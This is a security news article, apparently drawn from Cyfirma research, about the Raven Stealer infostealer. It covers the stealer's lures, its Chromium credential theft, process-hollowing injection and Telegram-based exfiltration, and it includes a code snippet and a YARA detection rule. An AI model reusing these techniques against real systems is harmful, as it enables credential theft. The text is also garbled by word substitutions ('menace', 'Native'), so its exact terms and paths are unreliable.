The commodity infostealer panorama has a brand new entrant in Raven Stealer, a compact Delphi/C++ binary that hijacks Telegram’s bot API to spirit away victims’ browser secrets and techniques.
First seen in mid-July 2025 on a GitHub repository operated by the self-styled ZeroTrace Crew, Raven arrives both packed as a UPX-compressed executable or bundled inside renamed attachments similar to “bill.3mf.exe”.
As soon as executed, the payload runs headlessly, by no means presenting a console window, and instantly prepares the bottom for covert exfiltration.
Assault chains noticed within the wild depend on convincing social-engineering lures that funnel targets to GitHub releases or direct Telegram messages containing the builder’s output.
Inside seconds of execution, the stub enumerates put in Chromium-based browsers, decrypts saved passwords and cookies, and scoops cryptocurrency wallets and autofill information right into a tidy folder hierarchy.
Cyfirma analysts famous the stealer’s disciplined listing construction—%Native%RavenStealerChrome, Edge, and Crypto Wallets—which simplifies post-infection triage for menace actors.
The ramifications are extreme: a single an infection yields area credentials, fee card particulars, and chronic session cookies that bypass MFA.
Compounding the menace, exfiltration leverages Telegram’s /sendDocument endpoint, permitting operators to obtain ZIP archives over an encrypted channel that almost all company firewalls allow by default.
Raven steler (Supply – Cyfirma)
This dashboard reveals Raven’s ensuing archive, whose filename embeds the sufferer’s username for easy cataloguing.
An infection Mechanism: Reflective Course of Hollowing inside Chromium
Raven’s most placing trick lies in its in-memory DLL injection chain. After unpacking itself (entropy >7 confirms UPX), the dropper decrypts an embedded DLL saved below useful resource ID 101 and harvests the Telegram bot_token and chat_id from assets 102 and 103.
Extracting Bot Token and ChatID (Supply – Cyfirma)
It then spawns chrome.exe in a suspended state with –headless –disable-gpu –no-sandbox, allocates reminiscence by way of NtAllocateVirtualMemory, and maps the DLL into the brand new course of—bypassing user-land hooks and hiding behind the browser’s professional signature.
A fraction of the resource-extraction routine illustrates Raven’s low-level fashion:-
HRSRC hRes = FindResourceW(NULL, MAKEINTRESOURCE(102), RT_RCDATA);
DWORD sz = SizeofResource(NULL, hRes);
BYTE* pBuf = (BYTE*)LockResource(LoadResource(NULL, hRes));
// pBuf now holds the Telegram bot token in plain textual content
As soon as assortment finishes, PowerShell compresses %Native%RavenStealer into %TEMP%_RavenStealer.zip, and curl.exe pushes the file to
A minimal YARA rule launched by Cyfirma pinpoints the menace by matching strings similar to “passwords.txt”, “api.telegram.org”, and the SHA-256 hash 28d6fbbd…55 embedded in older builds:-
$s1 = “api.telegram.org” nocase
$s2 = “%Native%RavenStealerChrome” nocase
situation: 3 of ($s*)
By intertwining stealth packing, syscall-level injection, and Telegram C2, Raven Stealer underscores how little experience is now required to mount high-yield credential-theft campaigns.
Expertise quicker, extra correct phishing detection and enhanced safety for your online business with real-time sandbox analysis-> Strive ANY.RUN now
